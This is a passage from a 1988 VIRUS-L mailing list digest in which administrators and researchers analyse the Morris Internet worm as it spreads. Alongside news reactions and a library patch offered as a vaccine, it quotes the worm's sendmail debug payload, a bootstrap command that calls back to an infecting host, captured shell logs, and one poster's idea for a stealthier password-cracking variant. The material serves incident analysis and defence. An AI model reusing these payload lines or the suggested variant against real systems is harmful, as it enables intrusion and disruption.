  1403.         Some comments taken from some recent VIRUS-L submissions:
  1404.  
  1405. > I should think that such a naming convention could be pretty useful
  1406. > whereby an EEV would be attributable to (presumably) a system programming
  1407. > error, and an FEV would be attributable to a system design deficiency.
  1408.  
  1409.  
  1410. > I'd also think that EEVs would be more prevalent on micros since there
  1411. > is no facility for memory protection, etc.
  1412.  
  1413.  
  1414.         Since a feature of most micros is no memory protection (and very
  1415.         little real protection of any sort), I consider most micro
  1416.         viruses to be FEVs.  If a micro had a buggy implementation of
  1417.         memory protection, than a virus that used a bug in the memory
  1418.         protection would be an EEV.  As it is, most micro are just
  1419.         exploiting design deficiencies (the definition above of an FEV).
  1420.  
  1421.                             B.J.
  1422. =========================================================================
  1423. Date:         Fri, 4 Nov 88 15:03:04 EST
  1424. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1425. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1426. From:         brian bulkowski <GE710012@BROWNVM>
  1427. Subject:      Internet Virus
  1428.  
  1429. I must say, the national news media is picking up on all this.
  1430. Would you believe that the first place I learned about this
  1431. virus/bacterium was on the front page of this morning's New
  1432. York Times? The artical basically said that the nation's
  1433. military computers were being invaded by a virus but that
  1434. the virus was clogging thier networks but not damaging the files.
  1435. (I thought, a ha, a bacterium.) Surprisingly accurate.
  1436.  
  1437. I agree that this seems to be a failure of a virus, and I wouldn't
  1438. be all that surprised if someone like the NSA released it to keep
  1439. people on their toes. Please don't flame me for spreading rumors,
  1440. but this virus is a good thing. "What doesn't kill us makes us
  1441. stronger."
  1442.  
  1443. A nastyier approach would be to have it fork a "nice" (non clock
  1444. cycle chewing process) that just tried to crack the su password
  1445. over a long period of time, and once it had it, wait, and do
  1446. damage at some later point. We're pretty lucky here, folks, that
  1447. this wasn't much worse. Obviously the writer could have done
  1448. much worse.
  1449.  
  1450. Anyone on the MILNET side feel like telling us how hard y'all were hit?
  1451.  
  1452. Yours without a large clogging signature box,
  1453. Brian
  1454. =========================================================================
  1455. Date:         Thu, 3 Nov 88 23:47:51 EST
  1456. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1457. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1458. From:         msmith@TOPAZ.RUTGERS.EDU
  1459. Subject:      INTERNET SENDMAIL VIRUS **AND PREVENTER**
  1460.  
  1461. Here is more off of UseNet about the virus, and at the bottom is a way
  1462. to prevent the virus from hitting your machine or reinfecting it.
  1463. -----------------------------------
  1464. From spaf@cs.purdue.edu (Gene Spafford) Thu Nov  3 20:11:06 1988
  1465. Path: topaz.rutgers.edu!rutgers!iuvax!mailrus!purdue!spaf
  1466. From: spaf@cs.purdue.edu (Gene Spafford)
  1467. Newsgroups: news.sysadmin
  1468. Subject: Re: The virus
  1469. Message-ID: <5312@medusa.cs.purdue.edu>
  1470. Date: 4 Nov 88 01:11:06 GMT
  1471. References: <5311@medusa.cs.purdue.edu>
  1472. Sender: news@cs.purdue.EDU
  1473. Reply-To: spaf@cs.purdue.edu (Gene Spafford)
  1474. Organization: Department of Computer Science, Purdue University
  1475. Lines: 140
  1476.  
  1477.  
  1478. This is an updated description of how the worm works (note: it is
  1479. technically a worm, not a virus, since it does not attach itself
  1480. to other code {that we know about}):
  1481.  
  1482. All of our Vaxen and some of our Suns here were infected with the
  1483. worm.  The worm forks repeated copies of itself as it tries to spread
  1484. itself, and the load averages on the infected machines skyrocketed.  In
  1485. fact, it got to the point that some of the machines ran out of swap
  1486. space and kernel table entries, preventing login to even see what was
  1487. going on!
  1488.  
  1489. The worm seems to consist of two parts.  The way that it works is as
  1490. follows:
  1491.  
  1492. 1) Virus running on an infected machine opens a TCP connection to a
  1493. victim machine's sendmail, invokes debug mode, and submits a version
  1494. of itself as a mail message.
  1495. *OR* it uses rsh to create itself on the remote machine through
  1496. an account requiring no password (due to hosts.equiv or .rhosts
  1497. entries).
  1498.  
  1499. Using the sendmail route, it does something like:
  1500. From: /dev/null
  1501. To: "|sed -e 1,/^$/d | sh; exit 0"
  1502.  
  1503. cd /usr/tmp
  1504. cat > x14481910.c <<'EOF'
  1505. <text of program deleted?
  1506. EOF
  1507. cc -o x14481910 x14481910.c;x14481910 128.10.2.215 32341 8712440;rm -f x14481910
  1508.     x14481910.c
  1509.  
  1510.  
  1511. 2) This program is a simple "listener" or "helper" program  of a few
  1512. dozen lines of fairly simple code.  As you can see, the helper is
  1513. invoked with arguments pointing back at the infecting worm (giving
  1514. hostid/socket/checksum(?) as arguments).
  1515.  
  1516. 3) The helper then connects to the "server" and copies a number of
  1517. files (presumably to /tmp).  After the files are copied, it exec's a
  1518. shell with standard input coming from the infecting worm program on
  1519. the other end of the socket.
  1520.  
  1521. >From here, I speculate on what happens since I can't find the source to
  1522. this part lying around on our machines:
  1523.  
  1524. 4) The newly exec'd shell attempts to compile itself from the files
  1525. copied over to the target machine.  The command file it uses is as
  1526. follows:
  1527.  
  1528. PATH=/bin:/usr/bin:/usr/ucb
  1529. rm -f sh
  1530. if [ -f sh ]
  1531. then
  1532. P=x%d
  1533. else
  1534. P=sh
  1535. cc -o $P %s
  1536. /bin/echo %s
  1537. ./$P -p $$
  1538.  
  1539. 5) This creates and dispatches the new worm..  This worm opens all the
  1540. worm source files, then unlinks the files so they can't be found (since
  1541. it has them open, however, it can still access the contents).  Next,
  1542. the worm steps through the hosts file (on the Sun, it uses YP to step
  1543. through the distributed hosts file) trying to connect to other
  1544. machines' sendmail.  If a connection succeeds, it forks a child process
  1545. to infect it, while the parent continues to attempt infection of other
  1546. machines.
  1547.  
  1548. 7) The child requests and initializes a new socket, then builds
  1549. and invokes a listener with the new socket number and hostid as
  1550. arguments (#1, above).
  1551.  
  1552.  
  1553. Other notes:
  1554.  
  1555. The worm runs in stages.  It first collects info from the /etc/hosts
  1556. files, the hosts.equiv file, and other files containing host names and
  1557. host IP addresses.  It even runs netstat to find out what networks the
  1558. machine is attached to!  It uses this information to attempt to
  1559. penetrate sendmail on those machines.  It also knows how to penetrate
  1560. "fingerd" on Vaxen (on Suns, the attempt results in a core dump).  I
  1561. will privately tell individuals how to fix the bug in fingerd, but for
  1562. now change it so it does not run as "root".
  1563.  
  1564. After this first stage, it appears to sleep for a while.  Then it starts
  1565. collecting user names and it begins probing with "rsh".  I believe it
  1566. also permutes either an internal list of words, or it uses the names
  1567. from passwd, but it also tries to see if it can break any of the
  1568. passwords for local accounts; if so, if forks a child to use telnet
  1569. to break into that account and copy itself.
  1570.  
  1571. It tries to copy itself to other systems using rsh, fingerd, and
  1572. possibly also uucp and/or ftp.
  1573.  
  1574. As I write this, no one seems to know what it is supposed to eventually
  1575. do.  Perhaps it just breaks in everywhere it can.  I wonder if
  1576. it isn't just going to wait until some compiled-in time and then
  1577. run an "rm -rf /" or something similar (and awful).  Has anyone noticed
  1578. new files in /usr/spool/at or included in /usr/lib/crontab?
  1579.  
  1580. Other notes:
  1581.  
  1582. The program corrupts its argument vector, so it appears in a "ps ax"
  1583. as "(sh)" (a login shell).  Don't trust any of these if you have
  1584. them running.
  1585.  
  1586. The program doesn't copy around source files (except the helper) --
  1587. it copies around pre-compiled binaries that are linked on the local
  1588. machine and then run.  The worm appears to only be carrying binaries
  1589. for 68020-based Suns and Vax 7xx machines.  Pyramids, Sun 2's and
  1590. Sequents are all definitely immune.
  1591.  
  1592. The strings in the binaries are encrypted against a random "strings"
  1593. invocation.  If you have a binary, Keith Bostic informs me that
  1594. Xor with 0x81 will reveal interesting things, although that is not
  1595. the only mask used.
  1596.  
  1597. The first observation of the virus I have heard about was 6pm
  1598. Wednesday night in Pittsburgh.  It didn't hit Purdue until about
  1599. 4 this morning.
  1600.  
  1601.  
  1602. I will update you with any further information I may find.
  1603. If you forward whatever information you find, I will try to
  1604. collate it.
  1605.  
  1606.  
  1607. --spaf
  1608.  
  1609.  
  1610. Acknowledgements:  Some of the above information was obtained from
  1611. Brian Kantor (UCSD), Keith Bostic (UCB), Thomas Narten (Purdue),
  1612. Dan Trinkle (Purdue), and Miek Rowan (Purdue).  Thanks, guys.
  1613. --
  1614. Gene Spafford
  1615. NSF/Purdue/U of Florida  Software Engineering Research Center,
  1616. Dept. of Computer Sciences, Purdue University, W. Lafayette IN 47907-2004
  1617. Internet:  spaf@cs.purdue.edu   uucp:   ...!{decwrl,gatech,ucbvax}!purdue!spaf
  1618.  
  1619.  
  1620. FLASH!!
  1621.  
  1622. Kevin ("Adb's your friend.") Braunsdorf  of Purdue CC just burst into
  1623. my office with a cure discovered in the disassembled worm binary.
  1624.  
  1625. If there is an external variable in the library named "pleasequit" that is
  1626. non-zero, the worm will die immediately after exiting.
  1627. Thus, to kill any new worms, include a patch in your library that
  1628. defines the symbol.  The following shell file and source code
  1629. will modify your C library to define this symbol.
  1630.  
  1631. It WON'T kill any currently linked and running versions, but it will
  1632. prevent reinfection.
  1633.  
  1634.  
  1635. # Shar archive.  Give the following as input to /bin/sh
  1636. #  Packed Thu Nov  3 21:56:35 EST 1988 by spaf@uther.cs.purdue.edu
  1637. #
  1638. #  This archive contains:
  1639. #       foo.sh
  1640. #       foo.c
  1641. #
  1642. #
  1643. echo x - foo.sh
  1644. sed 's/^X//' >foo.sh <<'*-*-END-of-foo.sh-*-*'
  1645. Xcc -c foo.c -o foo.o
  1646. Xcp /lib/libc.a /lib/libc.a.old
  1647. Xar q /lib/libc.a foo.o
  1648. Xranlib /lib/libc.a
  1649. *-*-END-of-foo.sh-*-*
  1650. echo x - foo.c
  1651. sed 's/^X//' >foo.c <<'*-*-END-of-foo.c-*-*'
  1652. Xextern int pleasequit = -1;
  1653. *-*-END-of-foo.c-*-*
  1654. exit
  1655. --
  1656. Gene Spafford
  1657. NSF/Purdue/U of Florida  Software Engineering Research Center,
  1658. Dept. of Computer Sciences, Purdue University, W. Lafayette IN 47907-2004
  1659. Internet:  spaf@cs.purdue.edu   uucp:   ...!{decwrl,gatech,ucbvax}!purdue!spaf
  1660.  
  1661. ----------------------------------------
  1662. There you have it.  The fix at the end will kill the virus if it hits
  1663. you, the way I figure it.
  1664.  
  1665. Mark
  1666. ----
  1667. Mark Smith (alias Smitty) "Be careful when looking into the distance,
  1668. RPO 1604; P.O. Box 5063  that you do not miss what is right under your nose."
  1669. New Brunswick, NJ 08903-5063    {backbone}!rutgers!topaz.rutgers.edu!msmith
  1670. msmith@topaz.rutgers.edu      Dukakis/Bentsen on Nov. 8th!!!
  1671. =========================================================================
  1672. Date:         Fri, 4 Nov 88 14:26:46 EST
  1673. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1674. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1675. From:         Rick McCreedy <RMCREEDY@WAYNEST1>
  1676. Subject:      Re: Internet Virus
  1677. In-Reply-To:  Message of Fri, 4 Nov 88 09:36:00 EDT from <NEWTON@NBSENH>
  1678.  
  1679. I'm interested in what local reaction has been elsewhere to the Internet
  1680. virus.
  1681.  
  1682. First I saw network news treatment, then the Detroit Free Press morning
  1683. edition this morning had an article on it.  This morning the local NBC
  1684. affiliate was here in our computer room videotaping interviews with our
  1685. systems staff on The Virus, and a reporter from the ABC station called
  1686. to say they'll be here this afternoon.  And our center here is not even
  1687. directly on the Internet.
  1688.  
  1689. I can't really find a reason why this is local news now, and previous
  1690. oubreaks weren't.  Is the only *big**news* in Detroit?
  1691. =========================================================================
  1692. Date:         Fri, 4 Nov 88 10:37:00 PST
  1693. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1694. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1695. From:         Ed Sakabu <CSMSETS@UCLAMVS>
  1696. Subject:      Details on the Internet VIRUS
  1697.  
  1698.  
  1699.  The following was taken from tcp-ip@SRI-NIC.ARPA
  1700.  
  1701.  ---------------------------- Text of forwarded message -----------------------
  1702. Received: (from UCLAMVS for UCLAMVS via NJE)
  1703.  (UCLA/Mail V1.410 M-CARPSYS#-6421-109); Fri, 04 Nov 88 04:33:50 PST
  1704. Received: from SRI-NIC.ARPA by OAC.UCLA.EDU
  1705.     with TCP; Fri, 4 Nov 88 4:33:45 PST
  1706. Received: from rand.org by SRI-NIC.ARPA with TCP; Thu, 3 Nov 88 21:58:30 PST
  1707. Received: from localhost by rand.org; Thu, 3 Nov 88 21:31:05 PST
  1708. Message-Id: <8811040531.AA10091@rand.org>
  1709. To: tcp-ip@SRI-NIC.ARPA
  1710. Subject: Details on the Internet VIRUS
  1711. Reply-To: salzman@RAND.ORG
  1712. Date: Thu, 03 Nov 88 21:30:58 PST
  1713. From: Isaac <salzman@RAND.ORG>
  1714.  
  1715.  
  1716. After carefully leaving the sendmail ``hole'' open on our Internet machine
  1717. I've been able to track (for the most part) what the virus is doing and
  1718. how it's spreading itself.
  1719.  
  1720. The C program that is uploaded and compiled is only the start.  After it's
  1721. compiled it's run with the following arguments: argv[1] is the Internet
  1722. addr of the infecting host, argv[2] is the port to connect to on that host
  1723. and argv[3] is the "magic" number. It connects back to the infecting host
  1724. and *carefully* transfers 3 files over.  The socket remains open and
  1725. /bin/sh is then exec'd so the infecting host can send shell commands to it
  1726. after the files are transferred. Following is an excerpt from the log file of
  1727. my hacked up version of the .c file that's uploaded:
  1728.  
  1729.   virus: pid=6828, args; x15886501 10.4.0.7 29451 15525687
  1730.   connection on sockect 0 active
  1731.   trying to write to file 'x15901447,sun3.o', len=47165
  1732.   file 'x15901447,sun3.o' written!
  1733.   trying to write to file 'x3338475,vax.o', len=45734
  1734.   file 'x3338475,vax.o' written!
  1735.   trying to write to file 'x11091853,l1.c', len=1542
  1736.   file 'x11091853,l1.c' written!
  1737.   starting up 'snoop' to watch the rest of the socket
  1738.  
  1739. "Snoop" is a shell script that's run in place of /bin/sh to capture the
  1740. shell commands that are being sent from the infecting host. Following is a
  1741. log of the shell commands are being sent:
  1742.  
  1743.   PATH=/bin:/usr/bin:/usr/ucb
  1744.   rm -f sh
  1745.   if [ -f sh ]
  1746.   then
  1747.   P=x10903971
  1748.   else
  1749.   P=sh
  1750.   fi
  1751.   cc -o $P x15901447,sun3.o
  1752.  
  1753.   ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c
  1754.  
  1755.   rm -f $P
  1756.   cc -o $P x3338475,vax.o
  1757.  
  1758.   ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c
  1759.  
  1760.   rm -f $P
  1761.   rm -f x15901447,sun3.o $P
  1762.   rm -f x3338475,vax.o $P
  1763.   rm -f x11091853,l1.c $P
  1764.  
  1765. They real key is to find out what ./$P is actually doing. Knowing the
  1766. arguments to the program that's uploaded and executed may be 1/2 the battle
  1767. there - especially if you're running on a Sun 3 with SunOS 4.0 (let's thank
  1768. Sun for the "trace" command).  So it's starting itself again, probably
  1769. using the pid ($$) as random seed, the rest of the arguments being the
  1770. names of the files to send off to the next victim. It looks real innocent
  1771. when you see "(sh)" in a ps listing (note what $P is set to)....
  1772.  
  1773. Earlier today Jim Gillogly (jim@rand.org) was able to find a table of
  1774. potential passwords that are probably used to crack accounts on the
  1775. infected machine. Some other research into the matter strongly suggests
  1776. that .rhosts and hosts.equiv files are used to target the next victim (that
  1777. seems to be common knowledge). It apparently tries one of two ways to break
  1778. into a machine. First it seems to try the rsh port. I've hacked up rshd to
  1779. report all outside attempts via syslog. It would consistenly come in over
  1780. rsh a minute or so before trying the SMTP port. Terry West (terry@rand.org)
  1781. hacked sendmail to report attempts to use the 'debug' command to the SMTP
  1782. server and log that with syslog as well, so we get stuff like this:
  1783.  
  1784.   Nov  3 18:10:12 rand-unix rsh[4311]: external address detected port=2,fam=1008
  1785.   Nov  3 18:10:43 rand-unix sendmail[4328]: AA04328: DEBUG set from: SM.UNISYS.C
  1786.   Nov  3 18:43:08 rand-unix rsh[5106]: external address detected port=2,fam=1021
  1787.   Nov  3 18:43:41 rand-unix sendmail[5126]: AA05126: DEBUG set from: XN.LL.MIT.E
  1788.   Nov  3 18:55:59 rand-unix rsh[5377]: external address detected port=2,fam=991,
  1789.   Nov  3 18:57:18 rand-unix sendmail[5421]: AA05421: DEBUG set from: XN.LL.MIT.E
  1790.   Nov  3 19:03:56 rand-unix rsh[5652]: external address detected port=2,fam=1015
  1791.   Nov  3 19:29:34 rand-unix rsh[6725]: external address detected port=2,fam=1003
  1792.   Nov  3 19:48:14 rand-unix rsh[7592]: external address detected port=2,fam=996,
  1793.   Nov  3 19:48:46 rand-unix sendmail[7614]: AA07614: DEBUG set from: SM.UNISYS.C
  1794.   Nov  3 19:55:50 rand-unix rsh[7698]: external address detected port=2,fam=1018
  1795.   Nov  3 19:56:25 rand-unix sendmail[7712]: AA07712: DEBUG set from: UXC.CSO.UIU
  1796.  
  1797. So that's the scoop, so far. Of course by the time this makes it out to
  1798. the tcp-ip list this will be old news, eh? :-) Now to tear apart the
  1799. fake "sh"..... Ciao!
  1800.  
  1801. --
  1802. * Isaac J. Salzman                                            ----
  1803. * The RAND Corporation - Information Sciences Dept.          /o o/  /
  1804. * 1700 Main St., PO Box 2138, Santa Monica, CA 90406-2138    | v |  |
  1805. * AT&T: +1 213-393-0411 x6421 or x7923 (ISL lab)            _|   |_/
  1806. * ARPA: salzman@RAND.ORG or salzman@rand-unix.ARPA         / |   |
  1807. * UUCP: ...!$cbosgd,decvax,sdcrdcf!randvax!salzman        | |   |
  1808.  
  1809.  
  1810. =========================================================================
  1811. Date:         Fri, 4 Nov 88 15:39:09 EDT
  1812. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1813. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1814. From:         Scott Earley <SCOTT@BITNIC>
  1815. Subject:      Computer Virus
  1816.  
  1817. BITNIC put this together and sent it to several lists.  Since the
  1818. topic is obviously germane here, I wanted to ensure your readers
  1819. of a timely posting.
  1820.  
  1821.    COMPUTER VIRUS
  1822.                  --from Internet and BITNET sources
  1823.  
  1824. The computer virus that is receiving national coverage can not
  1825. infect VM, MVS, or VMS BITNET hosts, because the virus is
  1826. dependent on specifics of the UNIX environment*.
  1827.  
  1828. Presently, it is our understanding that UNIX machines cannot be
  1829. infected through BITNET.  A UNIX machine that is also connected
  1830. to the Internet could be infected through its TCP/IP connection
  1831. via the SENDMAIL daemon--a Mail Transfer Agent in UNIX.
  1832.  
  1833. The virus is infecting SUN 3s and VAX Systems running UNIX BSD
  1834. derivatives.  This disruptive virus appears to be starting up
  1835. processes that result in a system bog-down.
  1836.  
  1837. There is discussion and a vaccine available on UNIX NETNEWS in
  1838. newsgroup comp.bugs.4bsd.ucb-fixes and in news.announce.important.
  1839.  
  1840.     *UNIX-like machines represent twelve percent of BITNET
  1841.      nodes in the United States.
  1842.  
  1843.  
  1844. UNIX is a trademark of AT&T.
  1845. =========================================================================
  1846. Date:         Fri, 4 Nov 88 21:04:07 GMT
  1847. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1848. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1849. From:         ZDEE676@OAK.CC.KCL.AC.UK
  1850. Subject:      Virus attack
  1851.  
  1852. I guess this latest virus attack must have been quite serious because
  1853. it even got on British television even though there were no reports of
  1854. affected machines over here (yet).
  1855. It goes to show that computers anywhere in the world could be caught
  1856. by this sort of program though.
  1857. =========================================================================
  1858. Date:         Fri, 4 Nov 88 13:19:27 EST
  1859. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1860. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1861. From:         Adam <ALEWIS@UTCVM>
  1862. Subject:      Re: Latest Virus in the News
  1863. In-Reply-To:  Message of Fri, 4 Nov 88 11:36:03 EST from <MAIL@UCONNVM>
  1864.  
  1865. >Has anyone heard about the current virus in the news?  Specifically,
  1866. >is it a virus designed for VM/CMS systems?
  1867. >
  1868. >John Hammond (Techrep)
  1869. >University Computer Center
  1870. >University of Connecticut
  1871.  
  1872.  
  1873.      The latest information that I've seen in postings in the net say
  1874. that the current virus making the rounds is limited to 4.3 BSD Unix
  1875. systems connected to ARPANet/MILNet.
  1876.      The preliminary discussion seems to imply that the virus uses
  1877. debugging code in the BSD sendmail program to open a TCP connection
  1878. to a target machine,  copys a helper program to the target,  compiles
  1879. this helper on the target, and then moves the object code for the
  1880. virus on the target machine.
  1881.      What occurs then is not very clear but it starts spawning
  1882. processes that bring the newly infected machine to its knees while
  1883. tring to spread itself through the rest of the net.
  1884.      It seems to be a rather nasty species of bug.  If anybody else
  1885. has more current information, please let us nervous Unix system
  1886. administrators know.
  1887. ----------------------------------------------
  1888. Adam Lewis
  1889. CECA
  1890. University of Tennessee, Chattanooga
  1891. ----------------------------------------------
  1892. =========================================================================
  1893. Date:         Fri, 4 Nov 88 15:52:00 EDT
  1894. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1895. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1896. From:         Savior faire is everywhere! <SSIRCAR@UMAECS>
  1897. Subject:      Internet Virus
  1898.  
  1899. Can someone tell me how far the Internet Virus has spread?  I don't remember
  1900. seeing an article on computer viruses ever making the front page of the
  1901. Boston Globe.
  1902.  
  1903.                                 -Santanu
  1904. =========================================================================
  1905. Date:         Fri, 4 Nov 88 16:08:23 EST
  1906. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1907. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1908. From:         Ed Nilges <EGNILGES@PUCC>
  1909. Subject:      Re: Internet Virus
  1910.  
  1911. Don't blame debugging hooks in operational SENDMAIL copies for this
  1912. virus!  The problem was debugging code that allowed you to submit
  1913. very privileged commands, not debugging code per se.
  1914.  
  1915. Which is not to say that debugging code (like any other code) can't
  1916. change the meaning of a baseline release.
  1917. =========================================================================
  1918. Date:         Fri, 4 Nov 88 14:01:49 EST
  1919. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1920. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1921. From:         woody <MAWEAVE@INDST>
  1922. Subject:      info from RISKS on milnet virus
  1923.  
  1924. This is forwarded from RISKS digest -- they have several articles on the
  1925. recent virus, as well as fixes and the complete(?) story of its genesis.
  1926.                                                -- woody
  1927.  
  1928.  
  1929. RISKS-LIST: RISKS-FORUM Digest  Thursday 3 November 1988   Volume 7 : Issue 69
  1930.  
  1931.         FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS
  1932.    ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator
  1933.  
  1934. Contents:
  1935.   Virus on the Arpanet - Milnet (Cliff Stoll)
  1936.   More on the virus (Gene Spafford, PGN, Matt Bishop)
  1937.   A320 update (Robert Dorset via Steve Philipson)
  1938.   Re: Conspiracy to Defraud (Dan Franklin)
  1939.   Re: Telephone answering machines (Vince Manis)
  1940.  
  1941. The RISKS Forum is moderated.  Contributions should be relevant, sound, in good
  1942. taste, objective, coherent, concise, and nonrepetitious.  Diversity is welcome.
  1943. CONTRIBUTIONS to RISKS@CSL.SRI.COM, with relevant, substantive "Subject:" line
  1944. (otherwise they may be ignored).  REQUESTS to RISKS-Request@CSL.SRI.COM.
  1945. FOR VOL i ISSUE j / ftp kl.sri.com / login anonymous (ANY NONNULL PASSWORD) /
  1946.   get stripe:<risks>risks-i.j ... (OR TRY cd stripe:<risks> / get risks-i.j ...
  1947.   Volume summaries in (i, max j) = (1,46),(2,57),(3,92),(4,97),(5,85),(6,95).
  1948.  
  1949. ----------------------------------------------------------------------
  1950.  
  1951. Date:  Thu, 3 Nov 88 06:46 EST
  1952. From: Stoll@DOCKMASTER.ARPA
  1953. Subject:  Virus on the Arpanet - Milnet
  1954.  
  1955. Re Arpanet "Sendmail" Virus attack November 3, 1988
  1956.  
  1957. Hi Gang!
  1958.  
  1959. It's now 3:45 AM on Wednesday 3 November 1988.  I'm tired, so don't believe
  1960. everything that follows...
  1961.  
  1962. Apparently, there is a massive attack on Unix systems going on right now.
  1963.  
  1964. I have spoken to systems managers at several computers, on both the east
  1965. & west coast, and I suspect this may be a system wide problem.
  1966.  
  1967. Symptom:  hundreds or thousands of jobs start running on a Unix system
  1968. bringing response to zero.
  1969.  
  1970. Systems attacked:  Unix systems, 4.3BSD unix & variants (eg:  SUNs) any
  1971. sendmail compiled with debug has this problem.  See below.
  1972.  
  1973. This virus is spreading very quickly over the Milnet.  Within the past 4
  1974. hours, I have evidence that it has hit >10 sites across the country,
  1975. both Arpanet and Milnet sites.  I suspect that well over 50 sites have
  1976. been hit.  Most of these are "major" sites and gateways.
  1977.  
  1978.  
  1979. Method:
  1980.  
  1981. Apparently, someone has written a program that uses a hole in SMTP
  1982. Sendmail utility.  This utility can send a message into another program.
  1983.  
  1984. Step 1:  from a distant Milnet host, a message is sent to Sendmail
  1985.        to fire up SED, (SED is an editor)  This is possible in certain
  1986.        versions of sendmail (see below).
  1987.  
  1988. 2:  A 99 line C program is sent to SED through Sendmail.
  1989.  
  1990. 3:  The distant computer sends a command to compile this C program.
  1991.  
  1992. 4:  Several object files are copied into the Unix computer.
  1993.         There are 3 files:  one targeted to Sun
  1994.                             one targeted to SUN-3
  1995.                             one targeted to vax    (ultrix probably, not vms)
  1996.  
  1997. 5:  The C program accepts as address other Milnet sites
  1998.  
  1999. 6:  Apparently, program scans for other Milnet/arpanet addresses and
  2000.      repeats this process.
  2001.  
  2002.  
  2003.  
  2004. The bug in Sendmail:
  2005.  
  2006. When the Unix 4.3 BSD version of Sendmail is compiled with the Debug
  2007. option, there's a hole in it.
  2008.  
  2009. Most Unix systems (BSD 4.3 and Suns) apparently do not have this bug.
  2010. It exists only where the system manager recompiled Sendmail and enabled
  2011. debugging.
  2012.  
  2013.  
  2014. This is bad news.
  2015.  
  2016.   Cliff Stoll dockmaster.arpa
  2017.  
  2018. ------------------------------
  2019.  
  2020. Date: Thu, 03 Nov 88 09:52:18 EST
  2021. From: Gene Spafford <spaf@purdue.edu>
  2022. Subject: More on the virus
  2023. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  2024.  
  2025. All of our Vaxen and some of our Suns here were infected with the virus.  The
  2026. virus forks repeated copies of itself as it tries to spread itself, and the
  2027. load averages on the infected machines skyrocketed.  In fact, it got to the
  2028. point that some of the machines ran out of swap space and kernel table entries,
  2029. preventing login to even see what was going on!
  2030.  
  2031. The virus seems to consist of two parts.  I managed to grab the source code for
  2032. one part, but not the main component (the virus cleans up after itself so as
  2033. not to leave evidence).  The way that it works is as follows:
  2034.  
  2035. 1) Virus running on an infected machine opens a TCP connection to a
  2036. victim machine's sendmail, invokes debug mode, and gets a shell.
  2037.  
  2038. 2) The shell creates a file in /tmp named $$,l1.c (where the $$ gets replaced
  2039.  
  2040. by the current process id) and copies code for a "listener" or "helper"
  2041. program.  This is just a few dozen lines long and fairly generic code.  The
  2042. shell compiles this helper using the "cc" command local to the system.
  2043.  
  2044. 3) The helper is invoked with arguments pointing back at the infecting
  2045. virus (giving hostid/socket/passwords as arguments).
  2046.  
  2047. 4) The helper then connects to the "server" and copies a number of files
  2048. (presumably to /tmp).  After the files are copied, it exec's a shell with
  2049. standard input coming from the infecting virus program on the other end of the
  2050. socket.
  2051.  
  2052. From here, I speculate on what happens since I can't find the source to
  2053. this part lying around on our machines:
  2054.  
  2055. 5) The newly exec'd shell attempts to compile itself from the files copied over
  2056. to the target machine.  I'm not sure what else the virus does, if anything --
  2057. it may also be attempting to add a bogus passwd file entry or do something to
  2058. the file system.  The helper program has an array of 20 filenames for the
  2059. "helper" to copy over, so there is room to spare.  There are two versions
  2060. copied -- a version for Vax BSD and a version for SunOS; the appropriate one is
  2061. compiled.
  2062.  
  2063. 6) The new virus is dispatched.  This virus opens all the virus source
  2064. files, then unlinks the files so they can't be found (since it has them
  2065. open, however, it can still access the contents).  Next, the virus
  2066. steps through the hosts file (on the Sun, it uses YP to step through
  2067. the distributed hosts file) trying to connect to other machines'
  2068. sendmail.  If a connection succeeds, it forks a child process to infect
  2069. it, while the parent continues to attempt infection of other machines.
  2070.  
  2071. 7) The child requests and initializes a new socket, then builds and invokes a
  2072. listener with the new socket number and hostid as arguments (#1, above).
  2073.  
  2074. The heavy load we see is the result of multiple viruses coming in from multiple
  2075. sites.  Since local hosts files tend to have entries for other local hosts, the
  2076. virus tends to infect local machines multiple times -- in some senses this is
  2077. lucky since it helps prevent the spread of the virus as the local machines slow
  2078. down.
  2079.  
  2080. The virus also "cleans" up after itself.  If you reboot an infected machine (or
  2081. it crashes), the /tmp directory is normally cleaned up on reboot.  The other
  2082. incriminating files were already deleted by the virus itself.
  2083.  
  2084. Clever, nasty, and definitely anti-social.
  2085.  
  2086. --spaf
  2087.  
  2088. ------------------------------
  2089.  
  2090. Date: Thu, 3 Nov 1988 14:27:22 PDT
  2091. From: Peter Neumann <neumann@csl.sri.com>
  2092. Subject: More on the virus attack
  2093.  
  2094. Remember that the above are preliminary messages relating to an event in
  2095. progress.  There seem to be many unanswered questions.  Perhaps someone will
  2096. contribute a definitive report to the next issue of RISKS.
  2097.  
  2098. Examination of the code suggests a fairly sophisticated person writing
  2099. relatively high quality (although undocumented) code, exploiting several flaws
  2100. that exist(ed) on many UNIX systems, and written with considerable good
  2101. practice in self-checking, reliability, etc.  From the evidence thus far, I
  2102. would guess it that this was a deliberate attack, not an accidental experiment
  2103. run astray.
  2104.  
  2105. Although it was primarily a denial of service attack, it did some remarkable
  2106. things, taking advantage of many different approaches.  The spawned
  2107. processes appear to have been doing attacks on encrypted passwords to enable
  2108. ftps (in case the .rhost attack would not work -- cf. the Stanford breakins
  2109. described in CACM and SEN by Brian Reid).  Separate versions to run on Suns
  2110. and Vaxens were apparently propagated in DES encrypted form, decrypted, and
